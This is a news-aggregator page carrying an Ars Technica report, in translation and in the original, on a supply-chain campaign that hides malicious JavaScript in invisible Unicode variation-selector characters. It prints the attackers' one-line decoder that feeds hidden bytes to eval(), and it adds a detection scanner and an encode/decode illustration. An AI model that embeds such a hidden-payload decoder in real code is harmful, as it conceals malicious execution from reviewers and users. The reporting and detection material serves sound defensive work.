Ars Technica • 78 days ago

Supply-chain attack using invisible code hits GitHub

IMP

8/10

Key summary

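Researchers have detected supply-chain attackers distributing large numbers of malicious packages to GitHub and other major repositories, using special Unicode characters that are invisible to the human eye. The packages are disguised as ordinary code commits, likely with the help of AI, and they defeat both manual code review and existing static analysis tools, which makes them a serious security threat.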

Translated text

Researchers say they have discovered a supply-chain attack that floods repositories with malicious packages containing invisible code, a technique that is confounding the traditional defenses designed to detect such threats.

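Researchers at Aikido Security said Friday that they found 151 malicious packages uploaded to GitHub between March 3 and March 9. Supply-chain attacks of this kind have been common for nearly a decade. They usually work by uploading malicious packages whose code and names closely resemble those of widely used code libraries, in order to trick developers into mistakenly incorporating them into their software. In some cases, these malicious packages are downloaded thousands of times.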

Defenses see nothing. Decoders see executable code.

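The packages Aikido found this month adopt a relatively new technique: the selective use of code that is not visible when loaded into virtually any editor, terminal, or code review interface. Most of the code appears in normal, readable form, but the malicious functions and payloads, the usual telltale signs of malice, are rendered in Unicode characters that are invisible to the human eye. The tactic, which Aikido said it first spotted last year, makes manual code review and other traditional defenses nearly useless. Other repositories hit in these attacks include NPM and Open VSX.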

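The malicious packages are even harder to detect because their visible portions are of such high quality. "The malicious injections don't arrive in obviously suspicious commits," Aikido researchers wrote. "The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project."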

The researchers named the attack group "Glassworm" and suspect that it is using large language models (LLMs) to generate these convincing, legitimate-looking packages. "At the scale we're now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn't feasible," they added. Koi, another security firm that has been tracking the same group, said it also suspects the group is using AI.

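The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. When fed to a computer, the code points represent every letter of the US alphabet, but their output is completely invisible to humans. People reviewing the code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, however, the code points translate into executable code.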
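Because reviewers see only blank space, one way to make such characters visible again is to scan source text by code point. The following is a minimal sketch, not Aikido's tooling. The function name findInvisibleRuns, the minRun threshold, and the list of ranges are assumptions made for illustration. The first two ranges are the ones tested by the decoder quoted later in this article (U+FE00 to U+FE0F and U+E0100 to U+E01EF, which Unicode defines as the Variation Selectors and Variation Selectors Supplement blocks), and the remaining three are the Private Use Areas named in the paragraph above.

```javascript
// Hypothetical scanner: names, ranges, and threshold are illustrative assumptions.
const INVISIBLE_RANGES = [
  [0xFE00, 0xFE0F],     // Variation Selectors
  [0xE0100, 0xE01EF],   // Variation Selectors Supplement
  [0xE000, 0xF8FF],     // Private Use Area (Basic Multilingual Plane)
  [0xF0000, 0xFFFFD],   // Supplementary Private Use Area-A
  [0x100000, 0x10FFFD], // Supplementary Private Use Area-B
];

// Returns one entry per run of at least `minRun` consecutive hidden code points.
// A threshold is used because a single selector (for example U+FE0F after an
// emoji) is common in legitimate text.
function findInvisibleRuns(source, minRun = 8) {
  const hits = [];
  let line = 1;
  let run = 0;
  for (const ch of source) { // for...of iterates by code point, not UTF-16 unit
    const cp = ch.codePointAt(0);
    const hidden = INVISIBLE_RANGES.some(([lo, hi]) => cp >= lo && cp <= hi);
    if (hidden) {
      run += 1;
    } else {
      if (run >= minRun) hits.push({ line, length: run });
      run = 0;
    }
    if (ch === "\n") line += 1;
  }
  if (run >= minRun) hits.push({ line, length: run });
  return hits;
}

// Usage: a template literal that looks empty but holds ten hidden characters.
const sample = "const a = 1;\nconst b = `" + String.fromCodePoint(0xFE00).repeat(10) + "`;\n";
console.log(findInvisibleRuns(sample));
```

A run-length threshold is a deliberate trade-off: it keeps ordinary emoji sequences from raising alerts, but a payload split into very short runs would slip under it, so the value would need tuning for a real codebase.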

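These invisible Unicode characters were devised decades ago and then largely forgotten. That changed in 2024, when hackers began using them to conceal malicious prompts fed to AI engines. Although the text was invisible to humans and text scanners, LLMs had little trouble reading it and following the malicious instructions it conveyed. AI engines have since devised guardrails to restrict use of the characters, but such defenses are periodically bypassed.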

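Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday's post, the attackers encoded a malicious payload using the invisible characters. Inspecting the code shows nothing. At JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.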

const s = v => [...v].map( w => ( w = w.codePointAt( 0 ), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter( n => n !== null ); eval (Buffer.from(s( `` )).toString( 'utf-8' ));

"The backtick string passed to s() looks empty in every viewer," the researchers explained.
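The byte mapping in the decoder above can be reproduced harmlessly to show why the string looks empty. The sketch below assumes Node.js (for Buffer, as in the quoted snippet). The names byteToSelector, hide, and reveal are hypothetical, and the encoder is simply the inverse implied by the decoder's arithmetic, not code recovered from the attack. Byte values 0 to 15 map to U+FE00 through U+FE0F and values 16 to 255 map to U+E0100 through U+E01EF. Unlike the malicious version, the decoded text is only printed, never passed to eval().

```javascript
// Hypothetical inverse of the article's s(): one byte becomes one invisible selector.
const byteToSelector = b =>
  String.fromCodePoint(b < 16 ? 0xFE00 + b : 0xE0100 + (b - 16));

// Illustrative encoder: UTF-8 bytes of the text, each mapped to a selector.
const hide = text =>
  [...Buffer.from(text, "utf-8")].map(byteToSelector).join("");

// Same arithmetic as the decoder quoted in the article, spread over several lines.
const reveal = hidden =>
  Buffer.from(
    [...hidden]
      .map(ch => {
        const cp = ch.codePointAt(0);
        if (cp >= 0xFE00 && cp <= 0xFE0F) return cp - 0xFE00;
        if (cp >= 0xE0100 && cp <= 0xE01EF) return cp - 0xE0100 + 16;
        return null; // any visible character is ignored
      })
      .filter(n => n !== null)
  ).toString("utf-8");

// Usage: the hidden string renders as nothing in most viewers, yet round-trips intact.
const hidden = hide("console.log('hi')");
console.log("hidden: `" + hidden + "`");
console.log("revealed:", reveal(hidden)); // printed only, never executed
```

Since every possible byte has its own selector, any payload can be carried this way, which is why the visible part of the file gives a reviewer nothing to catch.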

Original text (English)

Researchers say they’ve discovered a supply-chain attack flooding repositories with malicious packages that contain invisible code, a technique that’s flummoxing traditional defenses designed to detect such threats.

The researchers, from firm Aikido Security, said Friday that they found 151 malicious packages that were uploaded to GitHub from March 3 to March 9. Such supply-chain attacks have been common for nearly a decade. They usually work by uploading malicious packages with code and names that closely resemble those of widely used code libraries, with the objective of tricking developers into mistakenly incorporating the former into their software. In some cases, these malicious packages are downloaded thousands of times.

Defenses see nothing. Decoders see executable code

The packages Aikido found this month have adopted a newer technique: selective use of code that isn’t visible when loaded into virtually all editors, terminals, and code review interfaces. While most of the code appears in normal, readable form, malicious functions and payloads (the usual telltale signs of malice) are rendered in Unicode characters that are invisible to the human eye. The tactic, which Aikido said it first spotted last year, makes manual code reviews and other traditional defenses nearly useless. Other repositories hit in these attacks include NPM and Open VSX.

The malicious packages are even harder to detect because of the high quality of their visible portions.

“The malicious injections don’t arrive in obviously suspicious commits,” Aikido researchers wrote. “The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project.”

The researchers suspect that Glassworm, the name they assigned to the attack group, is using LLMs to generate these convincingly legitimate-appearing packages. “At the scale we’re now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn’t feasible,” they explained. Fellow security firm Koi, which has also been tracking the same group, said it, too, suspects the group is using AI.

The invisible code is rendered with Private Use Areas (sometimes called Private Use Access), which are ranges in the Unicode specification for special characters reserved for private use in defining emojis, flags, and other symbols. The code points represent every letter of the US alphabet when fed to computers, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only whitespace or blank lines. To a JavaScript interpreter, the code points translate into executable code.

The invisible Unicode characters were devised decades ago and then largely forgotten. That is, until 2024, when hackers began using the characters to conceal malicious prompts fed to AI engines. While the text was invisible to humans and text scanners, LLMs had little trouble reading them and following the malicious instructions they conveyed. AI engines have since devised guardrails that are designed to restrict usage of the characters, but such defenses are periodically overridden.

Since then, the Unicode technique has been used in more traditional malware attacks. In one of the packages Aikido analyzed in Friday’s post, the attackers encoded a malicious payload using the invisible characters. Inspection of the code shows nothing. During the JavaScript runtime, however, a small decoder extracts the real bytes and passes them to the eval() function.

const s = v => [...v].map( w => ( w = w.codePointAt( 0 ), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter( n => n !== null ); eval (Buffer.from(s( `` )).toString( 'utf-8' ));

“The backtick string passed to s() looks empty in every viewer, but it’s packed with invisible characters that, once decoded, produce a full malicious payload,” Aikido explained. “In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.”

Since finding the new round of packages on GitHub, the researchers have found similar ones on npm and the VS Code marketplace. Aikido said the 151 packages detected are likely a small fraction spread across the campaign because many have been deleted since first being uploaded.

The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before incorporating them into projects. This includes scrutinizing package names and searching for typos. If suspicions about LLM use are correct, malicious packages may increasingly appear to be legitimate, particularly when invisible Unicode characters are encoding malicious payloads.

Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords.

Security, supply-chain attack, GitHub, Unicode, AI coding

What the Claude Code source code leak suggests

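The leak of Claude Code's source code drew wide attention, along with criticism that the code quality is poor. The incident nonetheless shows that product-market fit (PMF) and observability, such as self-healing systems, matter far more to a software product's success than code quality does. It points to a shift in the software development paradigm in which the importance of the code itself is declining.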

Claude Code, source code leak, product-market fit

TechCrunch AI • 59 days ago

IMP 5

Anthropic withdraws source code takedown demands, calls it a "simple mistake"

Anthropic attempted a blanket takedown of its recently leaked source code, but soon withdrew most of the takedown requests. The company said the episode was not intentional and was a simple mistake (an accident).